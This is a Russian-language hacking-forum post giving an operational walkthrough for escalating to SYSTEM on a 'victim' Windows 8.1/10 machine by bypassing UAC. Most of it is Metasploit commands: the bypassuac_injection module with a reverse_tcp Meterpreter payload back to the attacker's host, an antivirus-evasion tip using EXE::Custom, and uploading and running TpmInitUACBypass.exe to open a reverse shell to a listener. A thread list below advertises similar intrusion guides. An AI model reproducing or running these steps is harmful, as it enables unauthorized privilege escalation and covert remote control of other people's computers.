Bypass UAC. Metasploit.

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
Всем привет! В этой статье я бы хотел описать один важный прием в работе с Meterpreter’ом. А в частности:

Способ повышения привилегий до системных, обход UAC на удаленном компьютере (жертве).

В этой статье будет описано два таких способа. Оба успешно проверены на операционных системах - Windows 8.1, Windows 10.
Итак, по порядку – UAC и привилегии.
Если коротко, то UAC Контроль учетных записей пользователей – это функция, которая появилась еще в Windows Vista с тех пор «окна» она не покидает и только совершенствуется, ее цель предотвратить несанкционированные изменения в системных файлах компьютера. UAC обеспечивает защиту, запрашивая разрешение или пароль администратора перед совершением потенциально опасных для компьютера действий или при изменении параметров, которые могут оказать влияние на работу других пользователей.

Видим работу UAC мы в следующем:
4034ba1c8cf9d428b3294ef18aa12d89.png


Это помешает нам в полной мере ощутить власть над ПК жертвы, т.к. права у нас весьма ограничены. Подключившись к удаленному компьютеру с активным UAC (как это сделать, описано в первой части -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

) вводим команду:

> getsystem

На что получаем ошибку с таким содержанием:
c7fa5496c6ece4b0e12fd4595cd73e71.png


Приступаем к осуществлению задуманного. Пишем:

> background

> use exploit/windows/local/bypassuac_injection

> options


Видим список опций, затем выставляем:

> set target 1 (
разрядность атакуемой системы, 1 – х64)

> set LPORT 4444 (
не обязательно 4444)

> set session 1 (
номер сессии)

> set LHOST 172.16.XXX.XXX (свой IP)

> set payload windows/x64/meterpreter/reverse_tcp (
используем х64 версию meterpreter)

> exploit

01a6295c1ed7ef337706557d451b98be.png


Команда успешно отрабатывает и мы видим открывшуюся сессию под номером 2, уже с системными привилегиями.

620660d07fab38ea6babcf11805f5c94.png


Дальнейшие действия уже зависят от нашей фантазии)

Так же хочу заметить один момент, более продвинутые пользователи Metasploit, наверняка в курсе, что генерированный фреймворком пайлоад не самый лучший вариант, т.к. антивирусы не дремлют и рано или поздно он придет в негодность. Поэтому я хочу обратить внимание на интересную опцию EXE::Custom в данном эксплоите. В подобных этому, она тоже присутствует. Ее задача, указать НАШ.exe файл в качестве исполняемого пайлоада. Пример использования опции:

> show advanced

> set EXE::Custom /root/наш файл

> exploit


Ниже, во втором способе, речь пойдет примерно о таком способе.

Способ номер 2
.

Эта технология описывает запуск на удаленном компьютере, стороннего файла с полезной нагрузкой. Базовые привилегии позволяют нам загрузить файлы в некоторые директории на нем.

Скачиваем файл с нагрузкой TpmInit UACBypass отсюда -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



В открытом терминале с meterpreter пишем:

> upload /root/Desktop/TpmIniyUACBypass.exe d:\\


Где,

upload ->
используется для загрузки файла.

/root/Desktop/TpmIniyUACBypass.exe
-> путь к файлу.

d:\\ ->
локация куда будет загружен файл.

cc9693364881ef1b8498c99f6af2ffac.png


Затем открываем второе окно с Metasploit и вводим следующее:

> use exploit/multi/handler

> set payload windows/x64/meterpreter/reverse_tcp

> set lhost 102.168.0.XXX

> set lport 4XXX

> exploit

Возвращаемся в предыдущее окно:

> shell

> d: (переходим туда, куда мы скопировали файл)

> TpmInitUACBypass.exe 192.168.0.ХХХ:4444 msf (запускаем файл)

cda28c85a75924e50b93e2c7e63d5f6f.png


Видим, что все прошло успешно, открылась сессия с системными привилегиями. Предыдущее окно можно закрывать.
 
  • Like
Реакции: ERMAG
Название темы
Автор Заголовок Раздел Ответы Дата
GhosTM@n Интересно Android Janus - APK Signature Bypass (****sploit) THROOT Полезные статьи 1
АнАлЬнАя ЧуПаКаБрА INLINE shop brute [captcha bypass] Проекты Private Keeper 0
T Bypass CloudFlare Софт для работы с текстом/Другой софт 1
Admin BransonSite Admin Panel bypass Уязвимости и взлом 0
Admin Rein Technologies Admin Panel Bypass Уязвимости и взлом 0
E Обход UAC Win 7/8/8.1/10 Полезные статьи 0
Eteriass Интересно Metasploit и Python Уязвимости и взлом 2
Eteriass Интересно Что такое koadic и почему не metasploit? Уязвимости и взлом 7
L Собираем информации о базах данных PostgreSQL используя Metasploit Уязвимости и взлом 0
K Metasploit для юнцов [Часть 1] Уязвимости и взлом 1
K PentestIT-Тестирование на проникновение с использованием Metasploit Framework https://cloud.mail.ru/public/HQgW/7oreizmBV Другое 0
K Мануал: Скрытое управление компьютером на Windows (используя Metasploit) #2 Уязвимости и взлом 0
K Мануал: Скрытое управление компьютером на Windows (используя Metasploit) #1 Уязвимости и взлом 3
S Ошибка metasploit wmap Уязвимости и взлом 1
I Взлом удаленного доступа nmap + metasploit (Kali linux) Полезные статьи 1
I Взлом windows 7-10 с помощью setoolkit и metasploit (Kali Linux) Полезные статьи 4
E [Видео] Взламываем Android девайс с помощью Metasploit Уязвимости и взлом 1
B Введение в Metasploit Framework Уязвимости и взлом 4
Admin Взлом удаленного ПК. Veil-Evasion. Metasploit. Уязвимости и взлом 4
Admin Aналог Metasploit для роутеров WiFi/Wardriving/Bluejacking 4

Название темы